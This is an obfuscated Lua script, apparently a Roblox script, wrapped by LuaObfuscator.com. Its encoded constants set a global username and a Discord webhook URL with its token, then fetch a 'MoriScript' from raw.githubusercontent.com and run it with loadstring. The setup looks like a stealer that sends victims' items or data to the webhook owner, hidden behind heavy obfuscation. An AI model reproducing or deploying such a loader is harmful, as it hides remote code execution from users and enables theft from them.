--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v80=0;while true do if (v80==0) then v19=v0(v3(v30,1,1));return "";end end else local v81=0;local v82;while true do if (v81==0) then v82=v2(v0(v30,16));if v19 then local v101=0;local v102;while true do if (v101==1) then return v102;end if (v101==0) then v102=v5(v82,v19);v19=nil;v101=1;end end else return v82;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v83=0 -0 ;local v84;while true do if (v83==(0 -0)) then v84=(v31/((3 -1)^(v32-(2 -(2 -1)))))%(((1147 -526) -(555 + (117 -53)))^(((v33-((1282 -(87 + 263)) -(857 + 74))) -(v32-(1066 -(68 + 997)))) + (569 -(367 + 201)))) ;return v84-(v84%(4 -3)) ;end end else local v85=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or (957 -(892 + 65)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=180 -(67 + 113) ;local v36;local v37;while true do if (v35==(0 + 0)) then v36,v37=v1(v16,v18,v18 + ((10 -6) -2) );v18=v18 + 2 ;v35=(1 -0) + 0 ;end if (v35==(3 -2)) then return (v37 * (1208 -(802 + 110 + 40))) + v36 ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (1000 -(915 + 82)) );v18=v18 + ((1198 -(1069 + 118)) -7) ;return (v41 * (9773502 + (15889403 -8885689))) + (v40 * (86188 -20652)) + (v39 * 256) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=1 -0 ;local v45=(v20(v43,1 + 0 ,35 -15 ) * ((2 + 0)^(823 -((1443 -1075) + 423)))) + v42 ;local v46=v20(v43,13 + 8 ,97 -(1979 -(1789 + 124)) );local v47=((v20(v43,113 -81 )==(19 -((776 -(745 + 21)) + 7 + 1))) and  -(3 -2)) or (443 -(416 + 26)) ;if (v46==(0 -0)) then if (v45==0) then return v47 * (0 + 0) ;else v46=1 + 0 + 0 ;v44=0 -0 ;end elseif (v46==(3127 -(1020 + 60))) then return ((v45==((3915 -2492) -(630 + 793))) and (v47 * ((1 -0)/(438 -((1200 -(87 + 968)) + 293))))) or (v47 * NaN) ;end return v8(v47,v46-(1453 -(44 + 386)) ) * (v44 + (v45/((1488 -(998 + (2148 -1660)))^(17 + 35)))) ;end local function v25(v48)local v49;if  not v48 then local v86=0 + 0 ;while true do if (v86==(0 -(0 -0))) then v48=v23();if (v48==(1413 -(447 + 966))) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;local v50={};for v64=(1 + 1) -1 , #v49 do v50[v64]=v2(v1(v3(v49,v64,v64)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=1700 -(1419 + 281) ;local v52;local v53;local v54;local v55;local v56;local v57;while true do if ((2 -0)==v51) then local v89=0;while true do if (v89~=0) then else local v100=0;while true do if (v100==(75 -(71 + 3))) then v89=1;break;end if (v100==0) then for v110=1 + 0 ,v56 do local v111=0;local v112;local v113;while true do if (v111==(2 -1)) then if (v112==1) then v113=v21()~=0 ;elseif (v112==(2 -0)) then v113=v24();elseif (v112==(244 -(187 + 54))) then v113=v25();end v57[v110]=v113;break;end if (v111~=0) then else v112=v21();v113=nil;v111=1;end end end v55[3]=v21();v100=781 -(162 + 618) ;end end end if (v89==1) then for v103=1 + 0 ,v23() do local v104=0;local v105;local v106;local v107;local v108;while true do if (v104==(1 + 0)) then v107=nil;v108=nil;v104=2;end if (v104==(3 -1)) then while true do if (v105==1) then v108=nil;while true do if (v106~=0) then else local v159=0 -0 ;while true do if (v159==(1 + 0)) then v106=1637 -(1373 + 263) ;break;end if (v159==0) then v107=1000 -(451 + 549) ;v108=nil;v159=1 + 0 ;end end end if (v106==(1 -0)) then while true do if (v107~=0) then else v108=v21();if (v20(v108,1 -0 ,1385 -(746 + 638) )==0) then local v162=0 + 0 ;local v163;local v164;local v165;while true do if (v162==(1 -0)) then v165={v22(),v22(),nil,nil};if (v163==0) then local v169=0;local v170;local v171;while true do if ((1 + 0)==v169) then while true do if (v170==(560 -(306 + 254))) then v171=0 + 0 ;while true do if (v171==0) then v165[3]=v22();v165[7 -3 ]=v22();break;end end break;end end break;end if (v169==(1467 -(899 + 568))) then v170=0 + 0 ;v171=nil;v169=2 -1 ;end end elseif (v163==1) then v165[3]=v23();elseif (v163==(605 -(268 + 335))) then v165[3]=v23() -((292 -(60 + 230))^(588 -(426 + 146))) ;elseif (v163~=3) then else local v181=0 + 0 ;local v182;local v183;while true do if (v181==(1457 -(282 + 1174))) then while true do if (v182==0) then v183=811 -(569 + 242) ;while true do if (v183~=(0 -0)) then else v165[1 + 2 ]=v23() -((1026 -(706 + 318))^16) ;v165[1255 -(721 + 530) ]=v22();break;end end break;end end break;end if (v181~=0) then else v182=1271 -(945 + 326) ;v183=nil;v181=2 -1 ;end end end v162=2;end if (v162==3) then if (v20(v164,3 + 0 ,703 -(271 + 429) )==1) then v165[4]=v57[v165[4]];end v52[v103]=v165;break;end if (v162==(0 + 0)) then local v167=1500 -(1408 + 92) ;local v168;while true do if (v167==0) then v168=0;while true do if (v168==0) then local v180=0;while true do if (v180~=(1086 -(461 + 625))) then else v163=v20(v108,2,3);v164=v20(v108,4,6);v180=1289 -(993 + 295) ;end if (v180==1) then v168=1 + 0 ;break;end end end if (v168~=(1172 -(418 + 753))) then else v162=1;break;end end break;end end end if (v162==(1 + 1)) then if (v20(v164,1,1 + 0 )~=1) then else v165[2]=v57[v165[1 + 1 ]];end if (v20(v164,2,1 + 1 )~=1) then else v165[532 -(406 + 123) ]=v57[v165[1772 -(1749 + 20) ]];end v162=3;end end end break;end end break;end end break;end if (v105~=(0 + 0)) then else local v117=0;while true do if (1~=v117) then else v105=1323 -(1249 + 73) ;break;end if (v117==0) then v106=0 + 0 ;v107=nil;v117=1146 -(466 + 679) ;end end end end break;end if (v104==(0 -0)) then v105=0 -0 ;v106=nil;v104=1;end end end v51=3;break;end end end if (v51==(1903 -(106 + 1794))) then local v90=0 + 0 ;local v91;while true do if (v90~=(0 + 0)) then else v91=0 -0 ;while true do if (v91~=0) then else for v114=1,v23() do v53[v114-1 ]=v28();end return v55;end end break;end end end if (1==v51) then v55={v52,v53,nil,v54};v56=v23();v57={};v51=2;end if (v51==(584 -(57 + 527))) then local v92=1427 -(41 + 1386) ;local v93;while true do if (v92==(103 -(17 + 86))) then v93=0;while true do if (v93==(0 + 0)) then v52={};v53={};v93=1;end if ((1 -0)~=v93) then else v54={};v51=2 -1 ;break;end end break;end end end end end local function v29(v58,v59,v60)local v61=v58[1];local v62=v58[2];local v63=v58[3];return function(...)local v66=v61;local v67=v62;local v68=v63;local v69=v27;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v87=0,v74 do if (v87>=v68) then v72[v87-v68 ]=v73[v87 + 1 ];else v76[v87]=v73[v87 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do local v88=0;while true do if (v88==1) then if (v79<=8) then if (v79<=3) then if (v79<=1) then if (v79==0) then local v118=v78[2];local v119,v120=v69(v76[v118](v13(v76,v118 + 1 ,v78[3])));v71=(v120 + v118) -1 ;local v121=0;for v147=v118,v71 do v121=v121 + 1 ;v76[v147]=v119[v121];end else v76[v78[2]]=v60[v78[3]];end elseif (v79>2) then v76[v78[2]]();else v76[v78[2]][v78[3]]=v78[4];end elseif (v79<=5) then if (v79>4) then v76[v78[2]]=v78[3]~=0 ;else v76[v78[2]][v78[3]]=v78[4];end elseif (v79<=6) then do return;end elseif (v79>7) then v76[v78[2]]=v78[3]~=0 ;else local v153=v78[2];v76[v153]=v76[v153](v13(v76,v153 + 1 ,v71));end elseif (v79<=12) then if (v79<=10) then if (v79>9) then local v129=v78[2];local v130=v76[v78[3]];v76[v129 + 1 ]=v130;v76[v129]=v130[v78[4]];else v76[v78[2]]=v78[3];end elseif (v79==11) then local v136=v78[2];local v137,v138=v69(v76[v136](v13(v76,v136 + 1 ,v78[3])));v71=(v138 + v136) -1 ;local v139=0;for v150=v136,v71 do local v151=0;while true do if (v151==0) then v139=v139 + 1 ;v76[v150]=v137[v139];break;end end end else local v140=v78[2];local v141=v76[v78[3]];v76[v140 + 1 ]=v141;v76[v140]=v141[v78[4]];end elseif (v79<=14) then if (v79==13) then do return;end else v76[v78[2]]=v60[v78[3]];end elseif (v79<=15) then v76[v78[2]]();elseif (v79>16) then local v155=v78[2];v76[v155]=v76[v155](v13(v76,v155 + 1 ,v71));else v76[v78[2]]=v78[3];end v70=v70 + 1 ;break;end if (v88==0) then v78=v66[v70];v79=v78[1];v88=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O0003013O004703083O00557365724E616D65030B3O0053652O6C696E676469732003023O005F4703093O00557365724E616D653203073O00576562682O6F6B037A3O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O3137333130373938332O343233373133382F57422D43666A75632O574E594C6579687A79762D3776366E456D74534F59684452334D7571773332462O65446143316C734235576F53793542356474567155456432765A20030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A000F3O0012013O00013O0030023O000200030012013O00043O0030023O000500030012013O00043O0030023O000600070012013O00083O001201000100093O00200A00010001000A0012100003000B4O0005000400014O000B000100044O00075O00022O00033O000100012O00063O00017O00",v9(),...);end
